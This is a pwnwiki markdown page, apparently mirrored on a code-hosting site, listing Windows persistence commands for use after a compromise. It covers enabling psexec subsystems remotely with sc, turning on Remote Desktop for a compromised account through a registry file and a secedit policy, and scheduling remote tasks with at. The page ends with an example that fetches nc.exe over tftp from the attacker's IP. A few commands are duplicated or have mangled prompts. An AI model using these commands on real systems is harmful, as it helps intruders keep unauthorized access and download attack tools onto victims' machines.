weyne/pwnwiki.github.io
1
0
Fork 0
mirror of https://github.com/oXis/pwnwiki.github.io.git synced 2025-10-29 16:56:59 +00:00
Code Issues Packages Projects Releases Wiki Activity
pwnwiki.github.io/persistence/windows/general.md
webbreacher e6c517135a Finished with Ames content.
2013-12-29 12:01:22 -05:00

3.7 KiB
Raw Blame History

Windows General Persistence Commands

Commands to run to maintain persistence after you have exploited it and are usually executed from the context of the cmd.exe or command.exe prompt.

Enable psexec

The psexec tool executes processes on other systems over a network. Most systems now disable the "clipbook" which psexec required. According to Val Smith's and Colin Ames' BlackHat 2008 presentation (page 50), you can re-enable the sub-systems needed to use psexec using the sc commands below.

c:\> net use \\[TargetIP]\ipc$ username /user:password
c:\> sc \\[TargetIP] config netdde start= auto
c:\> sc \\[TargetIP] config netddedsdm start= auto
c:\> sc \\[TargetIP] config clipsrv start= auto
c:\> sc \\[TargetIP] start netdde
c:\> sc \\[TargetIP] start netddedsdm
c:\> sc \\[TargetIP] start clipsrv

Enable Remote Desktop

Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' BlackHat 2008 presentation (page 53), you can remotely enable remote desktop using the commands below.

  1. On the compromised system, create a file named fix_ts_policy.ini containing the contents below. Change the "hacked_account" value to the account you have compromised on the remote system.

     [Unicode]
     Unicode=yes
     [Version]
     signature="$CHICAGO$"
     Revision=1
     [Privilege Rights] [Privilege Rights]
     seremoteinteractivelogonright = hacked_account
     seinteractivelogonright = hacked_account
     sedenyinteractivelogonright =
     sedenyremoteinteractivelogonright =
     sedenynetworklogonright =

  2. Create another file named enable_ts.reg containing the contents below.

     Windows Registry Editor Version 5.00
 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
 "fDenyTSConnections"=dword:00000000
 "TSEnabled"=dword:00000001
 "TSUserEnabled"=dword:00000000

  3. On the remote system, execute the following commands:

    c:\> sc config termservice start= auto sc config termservice start= auto

c:> regedit /s enable_ts.reg c:> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb c:> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb c:> secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini c:> gpupdate /Force c:> net start "terminal services"

Scheduler

The Windows scheduler can be used to further compromise a system. It usually runs at the SYSTEM account privilege level. According to Val Smith's and Colin Ames' BlackHat 2008 presentation (page 58), you can remotely schedule tasks using the commands below.

c:\> net use \\[TargetIP]\ipc$ password /user:username
c:\> at \\[TargetIP] 12:00 pm command

An example you might run on the remote system might be: at \\192.168.1.1 12:00pm tftp -I [MyIP] GET nc.exe